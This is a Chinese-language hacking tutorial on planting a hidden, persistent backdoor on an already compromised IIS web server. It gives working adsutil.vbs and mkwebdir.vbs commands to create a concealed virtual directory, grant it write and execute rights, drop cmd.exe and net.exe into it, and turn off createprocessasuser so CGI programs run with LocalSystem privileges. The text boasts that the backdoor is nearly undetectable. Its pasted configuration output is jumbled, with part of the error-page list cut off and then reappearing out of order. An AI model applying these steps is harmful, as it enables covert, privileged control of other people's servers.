IIS是比較流行的www服務器，設置不當漏洞就很多。入侵iis服務器后留下后門，以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監聽，比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務器端監聽遠程的連接控制。不過一個比較防范嚴密的www站點（他們的管理員吃了苦頭后）一般通過防火墻對端口進行限制，這樣除了管理員開的端口外，其他端口就不能連接了。但是80端口是不可能關閉的（如果管理員沒有吃錯藥）。那么我們可以通過在80端口留后門，來開啟永遠的后門。

當IIS啟動CGI應用程序時，缺省用CreateProcessAsUser API來創建該CGI的新Process,該程序的安全上下文就由啟動該CGI的用戶決定。一般匿名用戶都映射到IUSR_computername這個賬號，當然可以由管理員改為其他的用戶。或者由瀏覽器提供一個合法的用戶。兩者的用戶的權限都是比較低，可能都屬于guest組的成員。其實我們可以修改iis開啟CGI的方式，來提高權限。我們來看iis主進程本身是運行在localsystem賬號下的，所以我們就可以得到最高localsystem的權限。

入侵web服務器后，一般都可以綁定一個cmd到一個端口來遠程控制該服務器。這時可以有GUI的遠程控制，比如338Array，或者類telnet text方式的控制，比如rnc。nc肯定是可以用的,其實這也足夠了。

1. telnet到服務器

2. cscript.exe adsutil.vbs enum w3svc/1/root  
 
KeyType : (STRING) "IIsWebVirtualDir"  
 
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"  
 
AppFriendlyName : (STRING) "默認應用程序"  
 
AppIsolated : (INTEGER) 2  
 
AccessRead : (BOOLEAN) True  
 
AccessWrite : (BOOLEAN) False  
 
AccessExecute : (BOOLEAN) False  
 
AccessScript : (BOOLEAN) True  
 
AccessSource : (BOOLEAN) False  
 
AccessNoRemoteRead : (BOOLEAN) False  
 
AccessNoRemoteWrite : (BOOLEAN) False  
 
AccessNoRemoteExecute : (BOOLEAN) False  
 
AccessNoRemoteScript : (BOOLEAN) False 

HttpErrors : (LIST) (32 Items)  
 
"400,*,FILE,C:WINNThelpiisHelpcommon400.htm"  
 
"401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"  
 
"401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"  
 
"401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"  
 
"401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"  
 
"401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" 

FrontPageWeb : (BOOLEAN) True  
 
Path : (STRING) "c:inetpubwwwroot"  
 
AccessFlags : (INTEGER) 513  
 
[/w3svc/1/root/localstart.asp]  
 
[/w3svc/1/root/_vti_pvt]  
 
[/w3svc/1/root/_vti_log]  
 
[/w3svc/1/root/_private]  
 
[/w3svc/1/root/_vti_txt]  
 
[/w3svc/1/root/_vti_script]  
 
[/w3svc/1/root/_vti_cnf]  
 
[/w3svc/1/root/_vti_bin] 

不要告訴我你不知道上面的輸出是什么！現在我們心里已經有底了，是不是！呵呵 管理員要倒霉了

3. mkdir c:inetpubwwwrootdir1  
 
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1" 

這樣就建好了一個虛目錄：Virtual Dir1，你可以用 1 的命令看一下

5. 接下來要改變一下Virtual Dir1的屬性為execute

cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:  
 
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 

現在你已經可以upload 內容到該目錄，并且可以運行。你也可以把cmd.exe net.exe直接拷貝到虛擬目錄的磁盤目錄中。 bitsCN_com

6. 以下命令通過修改iis metabase 來迫使iis以本身的安全環境來創建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false  
 
注釋：cscript windows script host. bitscn.com  
 
adsutil.vbs windows iis administration script  
 
后面是 iis metabase path 

這樣的后門幾乎是無法查出來的，除非把所有的虛目錄察看一遍

"403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"  
 
"403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"  
 
"403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"  
 
"403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"  
 
"403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"  
 
"403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"  
 
"403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"  
 
"403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"  
 
"403,Array,FILE,C:WINNThelpiisHelpcommon403-Array.htm"  
 
"403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"  
 
"403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"  
 
"403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"  
 
"403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"  
 
"403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"  
 
"403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"  
 
"403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"  
 
"405,*,FILE,C:WINNThelpiisHelpcommon405.htm"  
 
"406,*,FILE,C:WINNThelpiisHelpcommon406.htm"  
 
"407,*,FILE,C:WINNThelpiisHelpcommon407.htm"  
 
"412,*,FILE,C:WINNThelpiisHelpcommon412.htm"  
 
"414,*,FILE,C:WINNThelpiisHelpcommon414.htm"  
 
"500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"  
 
"500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"  
 
"500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"  
 
"500,100,URL,/iisHelp/common/500-100.asp" 

IIS的后門解密就為大家介紹完了，希望大家已經掌握。

【編輯推薦】

1. 詳細解析數據加密
2. 內部網中的密碼管理
3. 探討ECC加密被破譯的可能性
4. 信息安全的核心之密碼技術 上